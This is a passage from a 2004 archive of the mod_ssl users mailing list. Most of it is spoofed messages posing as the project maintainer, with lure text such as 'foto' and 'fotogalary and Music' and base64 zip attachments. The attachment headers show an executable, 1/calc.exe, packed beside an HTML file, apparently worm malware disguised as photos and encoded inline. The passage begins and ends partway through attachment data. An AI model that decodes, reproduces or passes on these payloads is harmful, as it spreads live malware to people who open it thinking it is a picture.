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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------vvkuhhetmkrxmkozacgb--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 09:34:31 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6705CA8A7F; Wed,  1 Sep 2004 09:34:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from c-blougouras.net (ATuileries-117-1-12-97.w80-11.abo.wanadoo.fr [80.11.217.97])
	by master.modssl.org (Postfix) with SMTP id 45B40A8995
	for ; Wed,  1 Sep 2004 09:34:25 +0200 (CEST)
Date: Wed, 01 Sep 2004 09:31:37 +0100
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------zzldixdbqqkdpwmmuvsp"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------zzldixdbqqkdpwmmuvsp
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


>fotogalary and  Music





 :)





----------zzldixdbqqkdpwmmuvsp
Content-Type: image/bmp; name="dicqfjapuv.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="dicqfjapuv.bmp"
Content-ID: 

Qk02CAAAAAAAADYAAAAoAAAAQAAAABAAAAABABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/KgMqAyoD
KgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoDKgMqAyoD
KgMqAyoDKgMqA/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//neSNyoDuFP/f/9//3/+d5Q/
KgNwJ9pf/3//f/9/tkcqA5I33G//f/9//3//f3AnKgP+e/9//3/ba3AnKgO3T/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3+UPyoD22sqA7hT/3//f7ZHKgP+d7lbKgPaX/9/tkcqA/1z2l8qA9xv/3//f/9/tkcqA/1z
/3//f5I3KgP+e5I3tkf/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//fyoDKgP/fyoDcCf/f/9//3//f/9/3G8qA3An/3+UPyoD
/3//fyoDkjdwJyoDKgMqAyoDKgOUP/9//3//f/9/uFMqA9xv/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/kjcqA/9/KgMqA/9/
/3//f/9//3//fyoDcCf/f/9//3//f/9/KgMqA7dPKgP9c9trKgO3T/9//3/+d5Q/cCe4UyoD
uFP/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3/bayoD22sqA5Q//3//f/9//3//f9pfKgPba/9//3/+d/53/ncqA5I3/ntwJ5I3
/ncqA5Q//3//f7dPKgP9c9pfKgOSN/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/3G8qAyoDuVv/f/9//3//f5Q/KgOUP/53
/3//f5I3KgNwJ3An3G//f9xvKgPbYyoDKgP/f/9/KgMqA/9//ncqAyoD/3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3+2RyoD
/XMqA7lb/3//f/9//3/bYyoDtkf/f/9/t08qA9tj/3//f/9//3+5W3AnkjcqA/1z/38qAyoD
/3//fyoDKgP/f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//fyoDKgP/fyoDKgP/f/9//3//f/9/KgMqA/9//3/aXyoDuFP/f/9/
/3//f/9/lD8qAyoD22v/f5Q/KgP+e/9/KgOSN/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/tkcqA/1zKgOSN/9//3+4UyoD
/ncqA5Q//3//f/1zKgO2R/9//3//f/9//3/+d3AnKgPaX/9/3G8qA9pf/XMqA7hT/3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f7ZHKgOSN/53/3//f/53lD8qA5I3/nf/f/9//38qAyoDKgMqA/9//3//f/9/22sqA7ZH
/3//f9trkjcqA7ZH/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38=

----------zzldixdbqqkdpwmmuvsp
Content-Type: application/octet-stream; name="Cat.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Cat.zip"



----------zzldixdbqqkdpwmmuvsp--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 09:59:18 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 06B07A8CCC; Wed,  1 Sep 2004 09:59:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ryazan7.net (ecora.ryazan.ru [212.26.226.241])
	by master.modssl.org (Postfix) with SMTP id BB0CAA8A79
	for ; Wed,  1 Sep 2004 09:59:12 +0200 (CEST)
Date: Wed, 01 Sep 2004 11:59:11 +0300
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ecyocjuolwggkdlgwmiu"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ecyocjuolwggkdlgwmiu
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------ecyocjuolwggkdlgwmiu
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------ecyocjuolwggkdlgwmiu--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 11:14:58 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 48908A8A79; Wed,  1 Sep 2004 11:14:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Oraserver015.org (2.asx.dial.vsi.ru [80.82.37.2])
	by master.modssl.org (Postfix) with SMTP id 8F321A8934
	for ; Wed,  1 Sep 2004 11:14:50 +0200 (CEST)
Date: Wed, 01 Sep 2004 13:13:26 +0300
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------geebgzdmawtupbyhzfok"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------geebgzdmawtupbyhzfok
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------geebgzdmawtupbyhzfok
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
